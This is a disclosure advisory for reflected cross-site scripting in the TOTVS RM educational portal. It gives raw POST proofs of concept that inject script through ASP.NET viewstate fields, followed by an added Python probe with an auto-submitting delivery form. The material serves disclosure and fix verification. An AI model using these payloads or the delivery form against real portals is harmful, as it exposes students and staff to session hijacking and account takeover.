TOTVS RM PORTAL Cross Site Scripting

2016.02.16
Credit: vesp3r
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

TOTVS RM PORTAL (Educational) - Multiple Cross Site Scripting Vulnerabilities

Product web page: www.totvs.com.br
Author: vesp3r
Email: vesp3r7c3@gmail.com
Published: 13/02/2016

[Vendor Product Description]

TOTVS (pronounced Totus) is a Brazilian software company headquartered in Sao Paulo. TOTVS was initially formed from the merger of Microsiga and Logocenter and is the largest software company in Latin America. According to the FGV, TOTVS is the leader in the Brazilian ERP market; besides Brazil, it has offices in Argentina, Mexico and the United States.

[Advisory Timeline]

1- 22/Dec/2015 (No vendor response)
2- 05/Feb/2016 (No vendor response)

Tested on:
11.40.80.x
11.52.50.x
11.52.63.x
11.52.64.x
11.82.41.1
11.82.37.0
11.82.41.112
11.82.42.1
12.1.6.108
12.1.6.117
12.1.7.100
12.1.7.110
12.1.7.120
12.1.8.0
12.1.8.1

[Vulnerability Details]

Several pages of the portal reflect the submitted value of the ASP.NET __VIEWSTATE parameter (and, on RecoverPassConfirmation.aspx, the __EVENTVALIDATION parameter) back into the response without HTML-encoding it. A tampered value that carries markup, such as the "<script>alert(1)</script>" appended to the otherwise normal value in each proof of concept below, is therefore rendered and executed in the browser in the context of the vulnerable site.

Every proof of concept is a POST request, so a plain link is not enough: a remote attacker has to get the victim (a logged-in administrator in the worst case) to load an attacker-controlled page that auto-submits the crafted form to the portal. Login.aspx is reachable before authentication, so that case does not require a victim session at all. When verifying a fix, check that the echoed value comes back with "<", ">" and "&" encoded rather than relying on the absence of an alert.

1) Reflected Cross-site Scripting - Login.aspx
Parameter: __VIEWSTATE

POST /corpore.net/Login.aspx HTTP/1.1
[Snip...]
Content-Length: 599
Expect: 100-continue
Connection: Keep-Alive

__VIEWSTATEGENERATOR=67BA4204&__EVENTARGUMENT=&txtPass=&__VIEWSTATE=%2fwEPDwULLTE4NzE2MDUyNDEPZBYCAgUPZBYCAgMPZBYKAgQPFgIeDUVudGVyRGlzYWJsZWQFBUZhbHNlZAIIDxYCHwAFBUZhbHNlZAIMDxBkDxYBZhYBEAUJQ29ycG9yZVJNBQlDb3Jwb3JlUk1nFgFmZAIQDw9kFgIeD0Rpc2FibGVPblN1Ym1pdAUFZmFsc2VkAhIPD2QWAh4Hb25jbGljawURRm9yZ290UGFzc3dvcmQoKTtkZOnQ03VTJ%2f9xMgjAXrV8uog9rRH%2flHTcm8QGAjB9nwz8a0d92<script>alert(1)<%2fscript>cd412&ddlAlias=CorporeRM&txtUser=&btnLogin=btnLogin%3dAcessar&__EVENTTARGET=&__EVENTVALIDATION=%2fwEdAAVhABOpj5tofEWFrJaBMLLmDFTzKcXJqLg%2bOeJ6QAEa2kPTPkdPWl%2b8YN2NtDCtxie46B0WtOk572tmQWZGjlgiop4oRunf14dz

2) Reflected Cross-site Scripting - EduPSCadastroCandidato.aspx
Parameter: __VIEWSTATE

POST /Corpore.Net/Source/EduPS-ProcessoSeletivo/Public/EduPSCadastroCandidato.aspx HTTP/1.1
[Snip...]
Content-Length: 294
Expect: 100-continue
Connection: Keep-Alive

__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=26e09<script>alert(1)<%2fscript>6675c&__VIEWSTATEGENERATOR=2A268E6E&__EVENTVALIDATION=%2FwEdAGthFF%2FXOtK6iDwfhX1K6Jqoyk0VTIKR5mmZ%2BtIHMzMSvhs0Jc5vMLgh%2BScncp5A4h37bPOfETC9GIxfmAuz0Irc0oWQaruiZXPsPoJusmqmY3neRyPHmUYXvOoYPCF%2BNI6bJS0pQ

3) Reflected Cross-site Scripting - Calendar.aspx
Parameter: __VIEWSTATE

POST /Corpore.Net/SharedServices/LibPages/Calendar.aspx HTTP/1.1
[Snip..]
Content-Type: application/x-www-form-urlencoded
Content-Length: 370
Expect: 100-continue

__VIEWSTATEGENERATOR=CBEC090A&__EVENTARGUMENT=&__VIEWSTATE=%2fwEPDwUKMTY1OTMzMTQ5MmRk0Sm9YhG2VrmP7sr3Vdu25PXWEY00sTB9uOI0E2J%2bDto%3d8f844<script>alert(1)<%2fscript>f1c95&ddYear=1940&ddMonth=1&__LASTFOCUS=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEdANEBWDAi1sF9XTMpt%2bPoIvbLLrtqFwodORsBP5MdtMp97Worg0EVYGtniwWRlldVBtgv0s7aRHloaIopjAs%2b7nenbhd3yRDnFv26m%2by5T5c3Rd7F9O8yK3w

6) Reflected Cross-site Scripting - TstMain.aspx
Parameter: __VIEWSTATE

POST /Corpore.Net/Source/Tst-Avaliacao/RM.Tst.Provas/Public/TstMain.aspx HTTP/1.1
Referer: http://intra.ubm.br/Corpore.Net/Source/Tst-Avaliacao/RM.Tst.Provas/Public/TstMain.aspx
[Snip..]
Content-Length: 589
Expect: 100-continue
Connection: Keep-Alive

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=blFubtHIte6TnItfljNkVuCPdpxrn2d21QVLovI1Oj6c1BjTFGCeNA%2bNH1hljOzffBO%2bE1VjGIfJORklj03DwzHH9gnfklyMHTfrSc6jXT0lmgWQ%2fn09OLOLHFy22L%2f09cQ2cnhIJ8zjXTNBkJOTrizTSX8roB4A2%2f5F0nw%2bHMedUzRwjzgcvas%2bVdOqpdrMgp%2bqwioI9MguZtfxVD7ONhnPDwo%2bUgLB2QraeHh4Fd7DAFy2BsVsCl7an3DaKlx0pMIwi%2f2g%2f8y%2f5VXL1WbXYw%3d%3d63eb9<script>alert(1)<%2fscript>35554&__VIEWSTATEGENERATOR=D041C7D7&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=oIbBDabE%2FPH2SjDjDsk1A4dri3DAV4qax04lAj1I%2B3JimDK%2Bq%2Bl4qrek8MK8H861dVvJHSx56%2BNa5v49Ol5ulZsG3D1QPnf2XgNT1yp2LaTarGQOsUfw60t

5) Reflected Cross-site Scripting - RecoverPassConfirmation.aspx
Parameter: __EVENTVALIDATION

POST /Corpore.Net/SharedServices/LibPages/RecoverPassConfirmation.aspx?UserCaption=5LK%5c9F%5c3D%5c023%5c5B&ConfirmationCaption=%5c7B%5cFAbP%5c06%5c11Q%5c7C&RecoverContainerClassName=ASP.login_aspx%2c+App_Web_jfz24ryx%2c+Version%3d0.0.0.0%2c+Culture%3dneutral%2c+PublicKeyToken%3dnull&RecoverInitializeMethodName=GetRecoverPassServer&ServiceAlias=CorporeRM HTTP/1.1
[Snip..]
Content-Type: application/x-www-form-urlencoded
Content-Length: 458

__EVENTTARGET=btConcluir&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE2NDcyMzE4MDYPZBYCAgMPZBYEAgQPDxYCHgRUZXh0BQhVc3XDoXJpb2RkAgoPDxYCHwAFBUVtYWlsZGRkb5MeS264FOK9nmP0a1CNQffkay3Ey3ZEBuou6pi65D8%3D&__VIEWSTATEGENERATOR=AF2B313E&__EVENTVALIDATION=%2fwEdAAQGOgL7oK09LZ8PS37yV0yhEtmPWx9iivvmRAEsPWDH1L%2bBuAd%2fYR2jHO%2bKtDPe6m0Cy01bBAlsk2p17oJudhiaquajs%2bXic334N3XfjA0JtMaIEGbBaz%2fyyDVIoKpthJc%3dd8504<script>alert(1)<%2fscript>a2460&TextBoxUser=a%40a.com&TextBoxConfirmation=a%40a.com

Thanks to: Ewerson Guimares (Crash) and Rodrigo Favarini
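The following Python is an added example and is not part of the advisory or of TOTVS code. It automates the check the proofs of concept above perform by hand: append a unique, harmless tag to __VIEWSTATE (or any other form field), submit the form, and classify whether the server echoes the tag raw, HTML-encoded, or not at all. The login-form field values, the example host and the two simulated server pages (a vulnerable one that concatenates the rejected value into the response and a fixed one that encodes it) are constructed for the example; the parameter names are the standard ASP.NET ones seen in the requests above.

```python
"""Probe a POST form parameter for unencoded reflection (reflected XSS).

Added example, not the advisory's or TOTVS's code. The field values,
host name and simulated server pages below are constructed.
"""
import html
import secrets
from urllib.parse import parse_qs, urlencode


def build_probe_body(fields, target_param, token=None):
    """Append a unique harmless tag to one field and return (token, body).

    The tag is appended to the legitimate value, as the advisory's PoCs do,
    so the server still receives a tampered-but-present value. urlencode()
    percent-encodes '/', '+' and '=' in the base64 the same way the
    captured requests do.
    """
    token = token or secrets.token_hex(4)
    probe = f"<tvx{token}>"
    tampered = dict(fields)
    tampered[target_param] = f"{fields.get(target_param, '')}{probe}"
    return token, urlencode(tampered)


def classify_reflection(response_body, token):
    """'unencoded' if the raw tag came back (exploitable), 'encoded' if the
    server HTML-encoded it (safe), 'absent' if it was not echoed at all."""
    raw = f"<tvx{token}>"
    if raw in response_body:
        return "unencoded"
    if html.escape(raw) in response_body:
        return "encoded"
    return "absent"


# --- Simulated server behaviour (constructed, not TOTVS code) -------------
def vulnerable_error_page(body):
    """Echo the submitted __VIEWSTATE into an error page by concatenation."""
    vs = parse_qs(body).get("__VIEWSTATE", [""])[0]
    return f"<html><body>Invalid viewstate: {vs}</body></html>"


def fixed_error_page(body):
    """Same page, but the value is HTML-encoded before it reaches markup."""
    vs = parse_qs(body).get("__VIEWSTATE", [""])[0]
    return f"<html><body>Invalid viewstate: {html.escape(vs)}</body></html>"


def delivery_form_html(action_url, body):
    """Auto-submitting form: the PoCs are POST requests, so a victim has to
    load a page like this rather than click a plain link. Every attribute
    value is HTML-encoded so the payload survives the trip intact."""
    inputs = "".join(
        f'<input type="hidden" name="{html.escape(k, quote=True)}" '
        f'value="{html.escape(v, quote=True)}">'
        for k, vals in parse_qs(body, keep_blank_values=True).items()
        for v in vals
    )
    return (f'<form id="f" method="POST" action="{html.escape(action_url, quote=True)}">'
            f"{inputs}</form><script>document.getElementById('f').submit()</script>")


# Constructed login-form fields; the base64 values are placeholders.
LOGIN_FIELDS = {
    "__VIEWSTATE": "/wEPDwULLTE4NzE2MDUyNDEPZBYC",
    "__VIEWSTATEGENERATOR": "67BA4204",
    "__EVENTVALIDATION": "/wEdAAVhABOpj5tofEWFrJaBMLLm",
    "txtUser": "", "txtPass": "", "btnLogin": "Acessar",
}

if __name__ == "__main__":
    token, body = build_probe_body(LOGIN_FIELDS, "__VIEWSTATE", token="c0ffee")
    print("body:", body[:70] + "...")
    print("vulnerable page:", classify_reflection(vulnerable_error_page(body), token))
    print("fixed page:     ", classify_reflection(fixed_error_page(body), token))
    print(delivery_form_html("https://portal.example/corpore.net/Login.aspx", body)[:120])
```

Against a live target, replace the simulated pages with the body of the real HTTP response to the probe; only an "unencoded" result confirms the issue, and an "encoded" result after a patch is the evidence that the fix is output encoding rather than, say, a filter that happens to strip the word "script".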


Copyright 2019, cxsecurity.com